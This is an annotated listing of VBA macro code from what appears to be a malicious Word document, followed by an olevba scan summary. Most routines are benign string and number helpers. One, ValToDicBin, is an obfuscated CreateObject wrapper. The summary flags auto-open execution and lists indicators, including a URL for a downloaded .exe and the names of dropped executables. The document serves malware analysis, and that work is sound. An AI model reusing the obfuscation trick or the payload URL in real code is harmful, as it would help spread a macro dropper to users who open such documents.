  693. Function DecipherText(ByVal Origtext As String) As String
  694.  
  695.     DecipherText = Replace$(Origtext, kTerminator, vbCrLf)
  696.  
  697. End Function
  698.  
  699. '==========================================================================
  700. ' FUNCTION: MULTI-LINE TO SINGLE-LINE (//-TERMINATED)
  701. ' Converts multi-line //-terminated string into single-line string
  702. '==========================================================================
  703. Function CipherText(ByVal SourceString As String) As String
  704.  
  705.     CipherText = Replace$(SourceString, vbCrLf, kTerminator)
  706.  
  707. End Function
  708.  
  709.  
  710.  
  711. '==========================================================================
  712. ' FUNCTION: PADDING WITH ZEROS FROM LEFT (ex-ZeroFill)
  713. ' Padding (char-fill) to the left side of source string with 0 symbol.
  714. '==========================================================================
  715. Function ZeroFill(ByVal Src As String, ByVal DesiredLength As Long) As String
  716.  
  717.     If Len(Src) > DesiredLength Then Exit Function
  718.    
  719.     ZeroFill = Src
  720.    
  721.     Do Until Len(ZeroFill) = DesiredLength
  722.         ZeroFill = "0" & ZeroFill
  723.     Loop
  724.  
  725. End Function
  726.  
  727.  
  '==========================================================================
  ' FUNCTION: Fill
  ' Builds a string made of DesiredLength back-to-back copies of Src.
  '   Src           - text to repeat (may be longer than one character)
  '   DesiredLength - number of copies, NOT the length of the result
  '   Returns       - the repeated text; empty when DesiredLength <= 0
  '==========================================================================
  Function Fill(ByVal Src As String, ByVal DesiredLength As Long) As String

      Dim remaining As Long
      Dim repeated As String

      ' Count down from DesiredLength - 1 to 0: one copy per step.
      For remaining = DesiredLength - 1 To 0 Step -1
          repeated = repeated & Src
      Next remaining

      Fill = repeated

  End Function
  741.  
  742.  
  743.  
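  '==========================================================================
  ' FUNCTION: CharFillL
  ' Pads Src on the LEFT with FillChar until it is DesiredLength long.
  '   Src           - string to pad
  '   FillChar      - padding character; only its first character is used
  '   DesiredLength - target length of the result
  '   Returns       - padded string; Src truncated to DesiredLength when it
  '                   is longer; Src unchanged when FillChar is empty
  '==========================================================================
  Function CharFillL(ByVal Src As String, ByVal FillChar As String, ByVal DesiredLength As Long) As String

      ' Longer than requested: truncate instead of padding.
      If Len(Src) > DesiredLength Then CharFillL = Left$(Src, DesiredLength): Exit Function

      ' An empty FillChar can never lengthen the string, so padding is
      ' skipped rather than looping until a length that is never reached.
      If Len(FillChar) = 0 Then CharFillL = Src: Exit Function

      ' String$ repeats only the first character of its second argument.
      CharFillL = String$(DesiredLength - Len(Src), FillChar) & Src

  End Function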
  760.  
  761.  
  '==========================================================================
  ' FUNCTION: ValToDicBin (analyst annotation)
  ' Removes every "<" (Chr 60), "=" (Chr 61) and ";" (Chr 59) from the
  ' argument, passes what is left to CreateObject and returns the object.
  ' The parameter is not declared ByVal, so the caller's string is
  ' rewritten as well.
  ' This routine sits between documented string helpers but has no header
  ' of its own and a meaningless parameter name; the olevba summary at the
  ' end of this listing flags both CreateObject and Chr as suspicious.
  ' The object name never appears here as a literal, so a plain string
  ' search of this function will not show which object is created. To
  ' resolve it, apply the same three removals to the argument at each call
  ' site (call sites are outside this excerpt).
  '==========================================================================
  762. Public Function ValToDicBin(UIlhbjkhoiyH As String)
  763. UIlhbjkhoiyH = Replace(UIlhbjkhoiyH, Chr(60), "")   ' strip every "<"
  764. UIlhbjkhoiyH = Replace(UIlhbjkhoiyH, Chr(61), "")   ' strip every "="
  765. UIlhbjkhoiyH = Replace(UIlhbjkhoiyH, Chr(59), "")   ' strip every ";"
  766.  Set ValToDicBin = CreateObject(UIlhbjkhoiyH)       ' instantiate whatever name remains
  767. End Function
  768.  
  769.  
  770.  
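  '==========================================================================
  ' FUNCTION: CharFillR
  ' Pads Src on the RIGHT with FillChar until it is DesiredLength long.
  '   Src           - string to pad
  '   FillChar      - padding character; only its first character is used
  '   DesiredLength - target length of the result
  '   Returns       - padded string; Src truncated to DesiredLength when it
  '                   is longer; Src unchanged when FillChar is empty
  '==========================================================================
  Function CharFillR(ByVal Src As String, ByVal FillChar As String, ByVal DesiredLength As Long) As String

      ' Longer than requested: truncate instead of padding.
      If Len(Src) > DesiredLength Then CharFillR = Left$(Src, DesiredLength): Exit Function

      ' An empty FillChar can never lengthen the string, so padding is
      ' skipped rather than looping until a length that is never reached.
      If Len(FillChar) = 0 Then CharFillR = Src: Exit Function

      ' String$ repeats only the first character of its second argument.
      CharFillR = Src & String$(DesiredLength - Len(Src), FillChar)

  End Function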
  787.  
  788.  
  789.  
  '==========================================================================
  ' FUNCTION: CutOff
  ' Drops the first Length characters of SourceText.
  '   SourceText - string to shorten
  '   Length     - number of leading characters to remove (Byte, 0..255)
  '   Returns    - the remainder of the string; SourceText unchanged when
  '                it is not longer than Length
  '==========================================================================
  Function CutOff(ByVal SourceText As String, Length As Byte)

      ' Default: short strings are handed back untouched.
      CutOff = SourceText

      If Len(SourceText) > Length Then CutOff = Mid$(SourceText, Length + 1)

  End Function
  803.  
  804.  
  805.  
  '==========================================================================
  ' FUNCTION: TrueLOF
  ' Length of SourceString with every "/" character left out of the count.
  '   SourceString - string to measure
  '   Returns      - number of characters that are not "/"
  '==========================================================================
  Public Function TrueLOF(SourceString As String) As Integer

      Dim withoutSlashes As String

      withoutSlashes = Replace$(SourceString, "/", vbNullString)
      TrueLOF = Len(withoutSlashes)

  End Function
  815.  
  816.  
  817.  
  '==========================================================================
  ' FUNCTION: MergeModdedValues
  ' Joins the parModdedValue of every entry in
  ' PatchArray(PatchNumber).patchParams into one string, separated by
  ' kDivider2. PatchArray and kDivider2 are declared outside this excerpt.
  '   PatchNumber - index into PatchArray
  '   Returns     - the joined values; vbNullString on ANY runtime error
  '                 (for example an index out of range)
  '==========================================================================
  Public Function MergeModdedValues(PatchNumber As Integer) As String

      Dim collected() As String
      Dim paramIdx As Integer
      Dim firstIdx As Long
      Dim lastIdx As Long

      ' Every failure below is reported as an empty result.
      On Error GoTo ErrorHandler

      lastIdx = UBound(PatchArray(PatchNumber).patchParams)
      ReDim collected(lastIdx)
      firstIdx = LBound(PatchArray(PatchNumber).patchParams)

      For paramIdx = firstIdx To lastIdx
          collected(paramIdx) = PatchArray(PatchNumber).patchParams(paramIdx).parModdedValue
      Next paramIdx

      MergeModdedValues = Join(collected, kDivider2)
      Exit Function

  ErrorHandler:
      MergeModdedValues = vbNullString

  End Function
  843.  
  844.  
  845.  
  '==========================================================================
  ' FUNCTION: StripOut
  ' Removes from SourceString every character that occurs in SymbolsToKill.
  '   SourceString  - text to clean
  '   SymbolsToKill - set of characters to delete, written as one string
  '   Returns       - SourceString without those characters
  '==========================================================================
  Public Function StripOut(SourceString As String, SymbolsToKill As String) As String

      Dim symbolPos As Integer
      Dim cleaned As String
      Dim unwanted As String

      cleaned = SourceString

      ' One Replace pass per character of the kill list.
      For symbolPos = 1 To Len(SymbolsToKill)
          unwanted = Mid$(SymbolsToKill, symbolPos, 1)
          cleaned = Replace(cleaned, unwanted, vbNullString)
      Next symbolPos

      StripOut = cleaned

  End Function
  861.  
  862.  
  863.  
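  '==========================================================================
  ' FUNCTION: StripIn
  ' Keeps only the characters of SourceString that occur in SymbolsToLeave,
  ' in their original order.
  '   SourceString   - text to filter
  '   SymbolsToLeave - set of characters to keep, written as one string
  '   Returns        - the filtered text; empty when nothing matches
  ' Each source character is emitted at most once, even when the keep list
  ' names the same character several times.
  '==========================================================================
  Public Function StripIn(SourceString As String, SymbolsToLeave As String) As String

      ' Each variable is typed explicitly: "Dim i, i2 As Integer" types only
      ' the last name and leaves the others as Variant.
      Dim srcPos As Long
      Dim keepPos As Long
      Dim srcChar As String
      Dim keepChar As String
      Dim kept As String

      For srcPos = 1 To Len(SourceString)
          srcChar = Mid$(SourceString, srcPos, 1)

          For keepPos = 1 To Len(SymbolsToLeave)
              keepChar = Mid$(SymbolsToLeave, keepPos, 1)
              If srcChar = keepChar Then
                  kept = kept & keepChar
                  ' Stop at the first match so a repeated entry in the keep
                  ' list does not duplicate this character in the output.
                  Exit For
              End If
          Next keepPos
      Next srcPos

      StripIn = kept

  End Function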
  889.  
  890.  
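  '==========================================================================
  ' FUNCTION: Finalize
  ' Makes sure SourceString ends with the first character of EndChar.
  ' The check ignores letter case.
  '   SourceString - text to terminate
  '   EndChar      - desired final character; only its first character is
  '                  used
  '   Returns      - SourceString, with the character appended when it was
  '                  not already the last one
  '==========================================================================
  Public Function Finalize(SourceString As String, EndChar As String) As String

      Dim terminator As String

      terminator = Left$(EndChar, 1)

      If UCase$(Right$(SourceString, 1)) <> UCase$(terminator) Then
          ' Append to the SOURCE text. Appending to the still-empty return
          ' value would discard SourceString and return only the terminator.
          Finalize = SourceString & terminator
      Else
          Finalize = SourceString
      End If

  End Function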
  900.  
  901.  
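  '==========================================================================
  ' FUNCTION: CByteL
  ' Converts a Long to a Byte, clamping instead of raising an overflow.
  '   Value   - number to convert
  '   Returns - 255 for anything above 255, 0 for anything below 0,
  '             otherwise Value itself
  '==========================================================================
  Public Function CByteL(ByVal Value As Long) As Byte
      Select Case Value
          Case Is > 255
              CByteL = 255
          Case Is < 0
              ' CByte rejects negative numbers with an overflow error, so
              ' the lower bound needs its own clamp.
              CByteL = 0
          Case Else
              CByteL = CByte(Value)
      End Select
  End Function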
  909.  
  910.  
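  '==========================================================================
  ' FUNCTION: CIntL
  ' Converts a Long to a 16-bit Integer without raising an overflow: the
  ' low 16 bits of Value are reinterpreted as a signed number, so
  ' 32768..65535 map to -32768..-1.
  '   Value   - number to convert
  '   Returns - Value itself when it already fits an Integer, otherwise
  '             its low 16 bits read as a signed value
  '==========================================================================
  Public Function CIntL(ByVal Value As Long) As Integer
      Dim low16 As Long

      ' The trailing "&" makes the mask a Long (65535); plain &HFFFF is the
      ' Integer -1 and would mask nothing.
      low16 = Value And &HFFFF&

      ' Values with bit 15 set are the negative half of the Integer range.
      If low16 > 32767 Then low16 = low16 - 65536

      CIntL = CInt(low16)
  End Function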
  918.  
  919.  
  920.  
  '==========================================================================
  ' FUNCTION: Bin2Dec
  ' Converts a binary string (e.g. 01010101) into its decimal value
  ' (e.g. 85). The leftmost character is the most significant bit.
  '   Num     - string of binary digits; any character other than "1"
  '             counts as 0
  '   Returns - the value as a Long; 0 for an empty string
  '==========================================================================
  Public Function Bin2Dec(Num As String) As Long
      Dim digitPos As Long
      Dim digitCount As Long
      Dim total As Long

      digitCount = Len(Num)

      ' Walk left to right; the digit at position p weighs 2 ^ (count - p).
      For digitPos = 1 To digitCount
          If Mid(Num, digitPos, 1) = "1" Then
              total = total + (2 ^ (digitCount - digitPos))
          End If
      Next digitPos

      Bin2Dec = total
  End Function
  937.  
  938.  
  '==========================================================================
  ' FUNCTION: Dec2Bin8
  ' Renders a Byte as a string of 8 binary digits, most significant bit
  ' first.
  '   DecVal  - value to render (0..255)
  '   Returns - 8 characters, each "0" or "1"
  '==========================================================================
  Public Function Dec2Bin8(ByVal DecVal As Byte) As String
      Dim bitIndex As Integer
      Dim bits As String

      ' Emit bit 7 first so the string reads left to right.
      For bitIndex = 7 To 0 Step -1
          If (DecVal And (2 ^ bitIndex)) <> 0 Then
              bits = bits & "1"
          Else
              bits = bits & "0"
          End If
      Next bitIndex

      Dec2Bin8 = bits
  End Function
  957.  
  958.  
  '==========================================================================
  ' FUNCTION: Dec2Bin16
  ' Renders a 16-bit Integer as a string of 16 binary digits, most
  ' significant bit first.
  '   DecVal  - value to render; negative values show their bit pattern
  '             with the top bit set
  '   Returns - 16 characters, each "0" or "1"
  '==========================================================================
  Public Function Dec2Bin16(ByVal DecVal As Integer) As String
      Dim bitIndex As Integer
      Dim bits As String

      ' Emit bit 15 first so the string reads left to right.
      For bitIndex = 15 To 0 Step -1
          If (DecVal And (2 ^ bitIndex)) <> 0 Then
              bits = bits & "1"
          Else
              bits = bits & "0"
          End If
      Next bitIndex

      Dec2Bin16 = bits
  End Function
  977.  
  978. +------------+----------------------+-----------------------------------------+
  979. | Type       | Keyword              | Description                             |
  980. +------------+----------------------+-----------------------------------------+
  981. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
  982. | Suspicious | Open                 | May open a file                         |
  983. | Suspicious | Binary               | May read or write a binary file (if     |
  984. |            |                      | combined with Open)                     |
  985. | Suspicious | CreateObject         | May create an OLE object                |
  986. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  987. |            |                      | strings                                 |
  988. | Suspicious | SaveToFile           | May create a text file                  |
  989. | Suspicious | Write                | May write to a file (if combined with   |
  990. |            |                      | Open)                                   |
  991. | Suspicious | Output               | May write to a file (if combined with   |
  992. |            |                      | Open)                                   |
  993. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
  994. |            |                      | be used to obfuscate strings (option    |
  995. |            |                      | --decode to see all)                    |
  996. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  997. |            | Strings              | may be used to obfuscate strings        |
  998. |            |                      | (option --decode to see all)            |
  999. | IOC        | http://landrevie.g.f | URL (obfuscation: VBA expression)       |
  1000. |            | ree.fr/45gf3/7uf3ref |                                         |
  1001. |            | .exe                 |                                         |
  1002. | IOC        | ruebfo.exe           | Executable file name (obfuscation: VBA  |
  1003. |            |                      | expression)                             |
  1004. | IOC        | 7uf3ref.exe          | Executable file name (obfuscation: VBA  |
  1005. |            |                      | expression)                             |
  1006. +------------+----------------------+-----------------------------------------+